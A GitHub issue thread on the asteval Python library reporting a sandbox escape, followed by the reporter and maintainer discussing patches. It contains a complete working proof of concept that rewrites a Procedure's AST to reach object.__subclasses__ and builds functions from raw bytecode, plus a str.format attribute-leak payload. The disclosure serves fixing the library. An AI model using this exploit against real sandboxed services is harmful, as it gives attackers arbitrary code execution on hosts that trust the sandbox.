### ISSUE TITLE
Arbitrary code execution

### ISSUE THREAD

**Issue by henniss** [newville/asteval#32]
Constructing and running functions from arbitrary bytecode from within the sandbox. 

Tested in Python 3.6.2 on Linux.

```python
import asteval
aeval = asteval.Interpreter()

code = """

# To break out of the sandbox, we first try to get access to
# object.__subclasses__. Once we have that, we can get access to
# 'code' and 'function' and use these to construct new, real functions
# (not Procedures) from arbitrary bytecode.

# First up, lets get access to object:
object = str.__mro__[1]

# Getting __subclasses__ is harder. We're going to construct a
# Procedure `get_subclasses` which takes an object and returns its
# __subclasses__ attribute (basically a janky, restricted version of
# the built-in getattr).

def get_subclasses(x):return x.attribute

# Procedures leak access to their AST:

# get_subclasses.body[0].value.attr = hack_string

# hack_string is going to be an object with an __eq__ method which
# counts the number of times it is called until the `node.attr not in
# UNSAFE_ATTRS` check on line 408 is done, then it goes and modifies
# the AST of get_subclasses /again/ to replace node.attr with the plain old
# string '__subclasses__'.

## METHODS

# These are really Procedures, not true functions, so we don't have
# access to self. Maybe there's a way to fix that, but since we only
# need one it's easy to just use global state instead.

# I would rather count be a global integer, but that results in a
# runtime error: "attribute for storage: shouldn't be here."  I didn't
# look carefully enough to see why that is, but a list works fine as a
# counter.
count = [0]
def phony_eq(x):
    count[0] += 1
    if count[0] == 9:
        get_subclasses.body[0].value.attr = '__subclasses__'
        count[0] = 0

    if count[0] <= 9:
        return False

# Not needed, but meant less bizarre error messages when I was writing
# this
def phony_str(): return "<hack_string>"

# We can still create new classes using 'type'. I don't think it
# actualy matters that this be a str subclass.

hack_string = type('HackString',
                (str, ),
                {'__eq__': phony_eq,
                 '__str__': phony_str})()


# Now we're ready to put this in place.
get_subclasses.body[0].value.attr = hack_string
__subclasses__ = get_subclasses(object)

for c in __subclasses__():
    if c.__name__ == 'code':
        code = c
    if c.__name__ == 'function':
        function_ = c

# At this point we can create and run functions from arbitrary
# bytecode:

# For demonstration purposes, our function is the following:

#  def my_getattr(obj, attr):
#      return obj.__getattribute__(attr)

# which has bytecode

#  b'|\\x00j\\x00|\\x01\\x83\\x01S\\x00'

# We can't enter literal bytes objects, but that's okay:

getattr_bytecode = ('|\\0j\\0|' + chr(0x1)).encode('utf-8') + chr(0x83).encode('utf-8')[1:] + (chr(0x1) + 'S\\0').encode('utf-8')

code_obj = code(2, 0, 2, 2, 67, getattr_bytecode, (None, ), ('__getattribute__', ), ('obj', 'attr'), '', 'my_getattr', 0, ('\\0' + chr(0x1)).encode('utf-8'))
my_getattr = function_(code_obj, {})


print(my_getattr({}, '__class__'))
"""


aeval(code)
```

Result: 

```
<class 'dict'>
```

**Comment by newville** [comment]
@henniss Hm, thanks for the message.  Do you have a suggestion for how to prevent (or reduce) the possibility exploiting this?   

Perhaps prevent accessing `__mro__` should be blacklisted, though that seems like it could be circumvented.   

Perhaps prevent accessing `object.__name__`?    That might make it much hard to get to `code`, which seems like the biggest problem to me (but maybe I'm not fully appreciating).

**Comment by henniss** [comment]
>Perhaps prevent accessing __mro__ should be blacklisted, though that seems like it could be circumvented.

I agree that preventing access to `object` is likely to be hard. For example, the `__base__` attribute will get you it together with many types, including `type`, `complex`, or any exception type. I suspect there are many other ways. 

>Perhaps prevent accessing object.__name__? That might make it much hard to get to code, which seems like the biggest problem to me (but maybe I'm not fully appreciating).

That's not enough; you can just call each `c` in `__subclasses__()` as though it is `code` and catch the exceptions to dramatically filter the list of subclasses you need to look at. There might be more than one object to choose from, but I bet you can use `__sizeof__` on them to get a pretty good guess at which one you want.

IMHO the most critical issue is the ability to muck with Procedure objects through their `body` attribute. The ability to modify the AST of in-flight procedures effectively gives you free access to `getattr` which invalidates any blacklist. 

I was also surprised `type` was available, but I believe this attack would still be viable without it. Just create an instance of whatever you want (`ValueError`, for example), replace the `__eq__` method of that instance, and use that as your `hack_string`.

**Comment by newville** [comment]
@henniss hmm, we could (try to) prevent access to `Procedure.body`??  Not sure....  
Greatly restrict setting attributes seems like it might be too crippling.

**Comment by henniss** [comment]
What about just adding a check in `Procedure.on_attribute` that shuts down any attempt to access an attribute if `isinstance(sym, Procedure)`? 

The downside is that it breaks code that does things like
```python
def foo():
    foo.i += 1
    print(foo.i)
foo.i = 0
```
but I don't think that is common.

A softer alternative would be rename the Procedure attributes (`body` -> `_body`, etc...) and only reject access if, say, `isinstance(sym, Procedure) and node.attr.startswith('_')`

**Comment by newville** [comment]
@henniss I think the PR #33 now addresses this issue (or set of issues).

Similar to your suggestion, this (tries to) block setting any attributes of a Procedure after it has been defined.  It even severely limits accessing Procedure attributes, which is necessary to prevent one assigning to `my_proc.body[0]`.  I think there is no legit need for this in real use-cases for asteval. 

It also replaces `type()` with a variation that does not support variable and keyword arguments.  I think that this makes it much harder to make new classes that can be exploited as you demonstrate, though it may be that more changes like this are necessary.

Any thoughts or suggestsions?

**Comment by henniss** [comment]
#33 looks good.

`type` still worries me, since it effectively lowers the bar from "get access to `code`" to "get access to any `code` instance", but I don't yet see a way to get a `code` instance.

**Comment by newville** [comment]
@henniss Thanks -- I agree about `type` being scary, and that there may be more lurking, subtle ways to get `code`.....  But, I think this is a step forward, so thanks very much!

**Comment by henniss** [comment]
@newville 

Shoot, I just realized the changes to `type` won't work. `type(str)` gets you back the real `type` which you can use to create new classes.

I think that's definitely a hole we want to close because `str.format` is dangerous if you can pass it custom objects. You can write things like 
```python
"{0[foo.__code__.__class__]}".format(x)
```
where `x` keeps a list of everything that has been passed to `x.__getitem__`. 

It might be more important to lock down `str.format`. For some applications you'll want that anyway, to prevent information leaks. Armin Ronacher's post [here](http://lucumr.pocoo.org/2016/12/29/careful-with-str-format/) inspired this attack, and it's something Jinja2 also has to defend against.

**Comment by newville** [comment]
@henniss  Very good points!

I changed it so that `type` now returns the `__name__` of the object type:  the string representation, not the type itself.   It still seems useful to be able to inquire the type of an object. 

I also added an explicit test to prevent accessing the `format` attribute (or any attribute of a string containing 'format') of a string.   I'm not sure that's complete, but it's a start!  The ability to exploit `str.format` is pretty amazing!  So I agree that the `asteval` mini-language should not have that.
